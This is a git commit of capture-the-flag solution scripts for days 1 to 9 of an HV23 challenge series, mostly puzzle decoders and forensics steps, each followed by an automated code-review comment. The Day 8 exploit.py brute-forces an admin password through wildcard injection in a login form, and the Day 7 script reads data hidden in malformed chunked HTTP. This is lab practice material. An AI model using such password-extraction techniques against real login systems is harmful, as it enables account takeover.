Initial Commit Day 1-9
commit
697849f63e
BIN
Day 1/a-letter-from-santa.zip
Normal file
BIN
Day 1/a-letter-from-santa.zip
Normal file
Binary file not shown.
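--- a/Day 1/decode.py
+++ b/Day 1/decode.py
@@ -0,0 +1,32 @@
+import string
+from bs4 import BeautifulSoup
+from PIL import Image
+from pyzbar.pyzbar import decode
+
+qr_size = 25
+pix_size = 10
+img_size = pix_size * qr_size
+
+with open("templates/santa.j2", "r") as f:
+soup = BeautifulSoup(f.read(), "html.parser")
+img = Image.new("RGB", (img_size, img_size), "white")
+y = 0
+
+for c in string.ascii_lowercase:
+bin_str = ""
+x = 0
+for e in soup.find_all("span"):
+if e.text.strip() == "{{" + c + "}}":
+if "a" in e["class"]:
+color = (0, 0, 0)
+else:
+color = (255, 255, 255)
+
+for xi in range(x, x+pix_size):
+for yi in range(y, y+pix_size):
+img.putpixel((xi, yi), color)
+
+x += pix_size
+y += pix_size
+
+print("[+] Flag:", decode(img)[0].data.decode())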
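Review bot: `decode(img)[0]` on the last line indexes the pyzbar result without checking that anything was decoded, so a template that does not render to a readable QR code ends in a bare IndexError; bind the result first and fail with a message, e.g. `results = decode(img)` followed by `if not results: raise SystemExit("no QR code decoded")`. `e["class"]` raises KeyError for a matching span that has no class attribute, which `e.get("class", [])` avoids. `bin_str = ""` is assigned for every letter and never read, so it can be dropped. A short comment stating that each letter appears to select one row of the image and that class `a` marks a dark module would make the loop readable without the challenge text.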
2
Day 1/templates/santa.j2
Normal file
2
Day 1/templates/santa.j2
Normal file
File diff suppressed because one or more lines are too long
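--- a/Day 2/decode.py
+++ b/Day 2/decode.py
@@ -0,0 +1,3 @@
+data = "G d--? s+: a+++ C+++$ UL++++$ P--->$ L++++$ !E--- W+++$ N* !o K--? w O+ M-- V PS PE Y PGP++++ t+ 5 X R tv-- b DI- D++ G+++ e+++ h r+++ y+++"
+# "PGP++++" -> Philip Zimmerman
+print("[+] Flag: HV23{Philip Zimmerman}")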
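--- a/Day 3/decode.py
+++ b/Day 3/decode.py
@@ -0,0 +1,58 @@
+data = [
+["8","c","t","k","3"],
+["2","r","H","V","r"],
+["2","y",None,"0","v"],
+["2","e","n","3","_"],
+["}","3","h","{","m"],
+]
+
+def find_char(c, min=(0, 0)):
+for x, row in enumerate(data):
+for y, v in enumerate(row):
+if v == c and (x, y) >= min:
+return (x, y)
+
+
+def find_key(cirb="HV23{"):
+min = (0, 0)
+key = []
+for c in cirb:
+key.append(find_char(c, min))
+min = key[-1]
+key[3] = (4, 1) # or (3, 3)
+key.append(rotate(find_char('}'), 3)) # for final '}'
+return key
+
+def rotate(key, rotation):
+rotation = rotation % 4
+if rotation == 0:
+return key
+
+n = len(data) - 1
+rotated = []
+
+if isinstance(key, list):
+for (x, y) in key:
+rotated.append((y, n - x))
+else:
+rotated = (key[1], n - key[0])
+
+if rotation > 1:
+return rotate(rotated, rotation - 1)
+
+return rotated
+
+def get_text(key, rotation=0):
+text = ""
+key = list(sorted(rotate(key, rotation)))
+for (x, y) in key:
+text += data[x][y]
+return text
+
+key = find_key()
+
+flag = ""
+for i in range(0, 4):
+flag += get_text(key, -i)
+
+print("[+] Flag:", flag)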
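Review bot: `find_char` falls off the end and returns None when no cell equals `c` at or after `min`, and `find_key` appends that None to the key, so the failure only shows up later as a TypeError when `rotate` or `get_text` unpacks the entry; ending the function with `raise ValueError(f"{c!r} not found at or after {min}")` keeps the error at its cause. The parameter in `find_char` and the local in `find_key` are both named `min`, which shadows the builtin; `start` would read better. `key[3] = (4, 1) # or (3, 3)` replaces the searched position by hand, and a comment saying why the search result is not the wanted cell for that character would help the next reader.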
BIN
Day 4/bowser.elf
Executable file
BIN
Day 4/bowser.elf
Executable file
Binary file not shown.
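--- a/Day 4/decode.py
+++ b/Day 4/decode.py
@@ -0,0 +1,26 @@
+from hackingscripts import util
+from pwn import context, disasm
+import re
+
+if __name__ == "__main__":
+with open("bowser.elf", "rb") as f:
+elf = f.read()
+
+context.arch = "amd64"
+offset = 0x1332
+flag = b""
+
+for instr in disasm(elf[offset:], byte=False, offset=False).split("\n"):
+match = re.match(r"movabs\s+(rax|rdx),\s+0x([0-9a-f]+)", instr)
+if match:
+flag += util.xor(bytearray.fromhex(match[2])[::-1], 0xFF)
+else:
+match = re.match(r"mov\s+WORD PTR \[.*\],\s+0x([0-9a-f]+)", instr)
+if match:
+flag += util.xor(bytearray.fromhex(match[1])[::-1], 0xFF)
+elif re.match(r"call\s+.*", instr):
+break
+
+flag = flag.split(b"\x00")[1].decode()
+print("[+] Flag:", flag)
+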
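Review bot: `bytearray.fromhex(match[2])` takes the immediate exactly as the disassembler prints it, and disassemblers normally drop leading zeros, so an immediate with an odd number of hex digits raises ValueError and one whose top byte is zero yields fewer than eight bytes and shifts everything decoded after it. Converting by operand width avoids both: `bytearray(int(match[2], 16).to_bytes(8, "little"))` for the `movabs` case and `bytearray(int(match[1], 16).to_bytes(2, "little"))` for the `WORD PTR` case, each replacing the `fromhex(...)[::-1]` expression. `flag.split(b"\x00")[1]` assumes the decoded bytes contain at least one NUL and raises IndexError otherwise. The constant `offset = 0x1332` deserves a comment naming what it points at in bowser.elf and how it was found.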
BIN
Day 5/aurora.mp4
Normal file
BIN
Day 5/aurora.mp4
Normal file
Binary file not shown.
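--- a/Day 5/decode.py
+++ b/Day 5/decode.py
@@ -0,0 +1,47 @@
+from PIL import Image
+import os
+import sys
+import operator
+import subprocess
+import shutil
+
+def extract_frames(destination):
+os.makedirs(destination, exist_ok=True)
+subprocess.run(["ffmpeg", "-i", "aurora.mp4", "frames/out-%03d.png"])
+print()
+
+def parse_frame(file):
+img = Image.open(file)
+pix = img.load()
+return img.size, pix
+
+if __name__ == "__main__":
+
+output_directory = "frames"
+pixel_sum = None
+count = 0
+
+extract_frames(output_directory)
+for file in sorted(os.listdir(output_directory)):
+if file.endswith(".png"):
+sys.stdout.write(f"\rAnalyzing: {file}")
+(width, height), pix = parse_frame(os.path.join(output_directory, file))
+if pixel_sum is None:
+pixel_sum = [[(0,0,0) for y in range(height)] for x in range(width)]
+
+for x in range(width):
+for y in range(height):
+pixel_sum[x][y] = tuple(map(operator.add, pixel_sum[x][y], pix[x,y]))
+
+count += 1
+
+print("\nComposing new image")
+img = Image.new("RGB", (width, height))
+pix = img.load()
+
+for x in range(width):
+for y in range(height):
+pix[x,y] = tuple(map(operator.floordiv, pixel_sum[x][y], [count] * 3))
+
+img.save(f"result.png")
+shutil.rmtree(output_directory)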
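Review bot: `extract_frames` ignores its `destination` argument in the ffmpeg output pattern, which is hard-coded to `frames/out-%03d.png`, and it never checks ffmpeg's exit status, so when ffmpeg exits with an error the main block carries on with zero frames and stops at a NameError on `width`. Use `subprocess.run(["ffmpeg", "-i", "aurora.mp4", os.path.join(destination, "out-%03d.png")], check=True)`. The final `shutil.rmtree(output_directory)` deletes `frames` even when the directory existed before the run, which `exist_ok=True` silently accepts, so a `tempfile.TemporaryDirectory()` would be a safer scratch location. `img.save(f"result.png")` is an f-string with no placeholders.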
BIN
Day 5/result.png
Normal file
BIN
Day 5/result.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 296 KiB |
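--- a/Day 6/.gitattributes
+++ b/Day 6/.gitattributes
@@ -0,0 +1 @@
+memory.raw filter=lfs diff=lfs merge=lfs -text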
BIN
Day 6/cool-santa-claus.jpg
Normal file
BIN
Day 6/cool-santa-claus.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 186 KiB |
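--- a/Day 6/extract.sh
+++ b/Day 6/extract.sh
@@ -0,0 +1,3 @@
+vol -f memory.raw windows.info
+vol -f memory.raw windows.filescan | grep -i "png\|jpg\|jpeg"
+vol -f memory.raw windows.dumpfiles --virtaddr 0x918b76c517f0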
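Review bot: The address in `--virtaddr 0x918b76c517f0` is only meaningful next to the `windows.filescan` line it was copied from, and nothing in the script records which file it refers to; add a comment such as `# virtaddr of <file name from the filescan output>` above the `dumpfiles` line. The script has no shebang, so `#!/usr/bin/env bash` as the first line would make it runnable as committed. Recording `sha256sum memory.raw` before the analysis would tie the extracted files to the exact image stored via LFS.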
4480
Day 6/files.txt
Executable file
4480
Day 6/files.txt
Executable file
File diff suppressed because it is too large
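--- a/Day 6/memory.raw
+++ b/Day 6/memory.raw
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0d38311133ba9580a4bac36aee55f4f08a75f0462cc040907a179ad4b4351c87
+size 2147483648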
BIN
Day 6/wallpaper.png
Normal file
BIN
Day 6/wallpaper.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 1.6 MiB |
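--- a/Day 7/exploit.py
+++ b/Day 7/exploit.py
@@ -0,0 +1,63 @@
+#!/usr/bin/env python
+
+# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
+# https://git.romanh.de/Roman/HackingScripts
+
+import os
+import re
+import sys
+import json
+import time
+import base64
+import requests
+import subprocess
+import urllib.parse
+import string
+from bs4 import BeautifulSoup
+from hackingscripts import util, rev_shell
+from hackingscripts.fileserver import HttpFileServer
+
+import socket
+from PIL import Image
+
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+HOST = "44c5decd-6619-4ce0-859a-882ed74f1736.rdocker.vuln.land"
+IP_ADDRESS = util.get_address()
+
+def get_image_bytes():
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((HOST, 80))
+sock.sendall(b"\n")
+
+data = b""
+
+while True:
+b = sock.recv(1024)
+if not b:
+break
+
+data += b
+
+body_offset = data.index(b"\n\n") # malformed here
+header, body = data[:body_offset], data[body_offset+2:]
+
+return header, body
+
+if __name__ == "__main__":
+
+header, body = get_image_bytes()
+
+flag = ""
+while body:
+offset_index = body.index(b"\r\n")
+chunk_size = int(body[0:offset_index], 16)
+offset = offset_index + 2
+chunk = body[offset:offset+chunk_size]
+body = body[offset+chunk_size+2:]
+
+if chunk_size > 0x900:
+flag += chr(chunk_size & 0xFF)
+
+print("[+] Flag:", flag)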
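Review bot: `get_image_bytes` opens its socket with no timeout and never closes it, so the `recv` loop blocks indefinitely if the server keeps the connection open and the descriptor leaks on any exception; `with socket.create_connection((HOST, 80), timeout=10) as sock:` covers both. `data.index(b"\n\n")` and, in the main loop, `body.index(b"\r\n")` raise a bare ValueError when the separator is absent, and `int(body[0:offset_index], 16)` does the same for a chunk-size line that carries an extension, so a message naming the offending bytes would make a changed response easier to diagnose. Most of the template imports (`requests`, `subprocess`, `BeautifulSoup`, `rev_shell`, `HttpFileServer`, `Image`) are unused in this file, and `IP_ADDRESS = util.get_address()` runs at import time for a value the script never reads. The threshold `0x900` and the `& 0xFF` mask need a comment explaining how oversized chunk lengths carry the hidden bytes.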
BIN
Day 8/bask-source.zip
Normal file
BIN
Day 8/bask-source.zip
Normal file
Binary file not shown.
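--- a/Day 8/exploit.py
+++ b/Day 8/exploit.py
@@ -0,0 +1,85 @@
+#!/usr/bin/env python
+
+# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
+# https://git.romanh.de/Roman/HackingScripts
+
+import string
+import os
+import re
+import sys
+import json
+import time
+import base64
+import requests
+import subprocess
+import urllib.parse
+from bs4 import BeautifulSoup
+from hackingscripts import util, rev_shell
+from hackingscripts.fileserver import HttpFileServer
+
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+BASE_URL = "https://a26e7e66-6235-404e-8c62-051b082e0082.idocker.vuln.land" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
+IP_ADDRESS = util.get_address()
+
+def request(method, uri, **kwargs):
+if not uri.startswith("/") and uri != "":
+uri = "/" + uri
+
+client = requests
+if "session" in kwargs:
+client = kwargs["session"]
+del kwargs["session"]
+
+if "allow_redirects" not in kwargs:
+kwargs["allow_redirects"] = False
+
+if "verify" not in kwargs:
+kwargs["verify"] = False
+
+if "proxies" not in kwargs:
+kwargs["proxies"] = {"http":"http://127.0.0.1:8080", "https":"http://127.0.0.1:8080"}
+
+return client.request(method, BASE_URL + uri, **kwargs)
+
+def login(password):
+while True:
+# post payload is not URL decoded, so we can't use dictionary
+res = request("POST", "/login", data=f"password={password}")
+if "Successfully logged in" in res.text:
+return True
+elif "Invalid username or password!" in res.text:
+return False
+
+def retrieve_flag(cookie):
+while True:
+res = request("GET", "/admin", cookies={"admin_token": cookie})
+util.assert_content_type(res, "text/html")
+if "You are not authorized to view this page." in res.text:
+return None
+else:
+match = re.search(r"Your flag is: (HV23\{.*\})", res.text)
+if match:
+return match[1]
+
+
+if __name__ == "__main__":
+password = "salami"
+flag = retrieve_flag(password)
+while flag is None:
+found = False
+for x in string.printable:
+if x in ["*", "\\"]:
+continue
+
+if login(password + x + "*"):
+password += x
+found = True
+flag = retrieve_flag(password)
+break
+
+if not found:
+break
+
+print("[+] Flag:", flag)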
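Review bot: `request()` defaults to `verify=False` and to a proxy at `127.0.0.1:8080`, so every call to the remote `https://` target skips certificate validation and hands the password and the `admin_token` cookie to whatever is listening on that port, while the module-level `disable_warnings` call hides the only signal that this is happening. Make both opt-in, e.g. `kwargs.setdefault("verify", True)` and set `proxies` only when a switch such as `"PROXY" in sys.argv` is given, following the existing `"LOCAL"` convention. `login` and `retrieve_flag` loop on `while True` and return only when one of the expected strings appears, so an error page or a rate-limit response is retried forever with no delay; bound the loop and raise after a few attempts. The regex `HV23\{.*\}` is greedy and would run to the last `}` on the line, which `HV23\{[^}]*\}` avoids.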
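--- a/Day 9/decode.py
+++ b/Day 9/decode.py
@@ -0,0 +1,22 @@
+import os
+import re
+import datetime
+from bs4 import BeautifulSoup
+from hackingscripts.pcap_file_extract import PcapExtractor, HttpRequest, HttpResponse
+
+if __name__ == "__main__":
+
+chars = []
+pcap_extractor = PcapExtractor("secret_capture.pcapng")
+for response in pcap_extractor:
+match = re.match(r"/\?door=(\d)", response.get_file_path())
+if match and isinstance(response, HttpResponse):
+request = response.response_to
+ip, port = request.socket.split(":")
+port = int(port)
+c = chr(port - 56700)
+dt = datetime.datetime.strptime(response.headers["Date"], "%a, %d %b %Y %H:%M:%S %Z").timestamp()
+chars.append((dt, c))
+
+flag = "".join(entry[1] for entry in sorted(chars))
+print("[+] Flag:", flag)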
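Review bot: `sorted(chars)` orders the `(dt, c)` tuples by timestamp and then by character, and the HTTP `Date` header has one-second resolution, so two responses within the same second come out in alphabetical rather than capture order. Sort on the timestamp alone with `sorted(chars, key=lambda entry: entry[0])`, which is stable and keeps the extractor's order for ties (assuming `PcapExtractor` yields in capture order), or use the packet timestamp if the extractor exposes one. `chr(port - 56700)` raises ValueError for a source port below 56700 and `response.headers["Date"]` raises KeyError when the header is absent, and neither is guarded. `get_file_path()` is called before the `isinstance(response, HttpResponse)` test, so the type check should come first.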
BIN
Day 9/secret_capture.pcapng
Normal file
BIN
Day 9/secret_capture.pcapng
Normal file
Binary file not shown.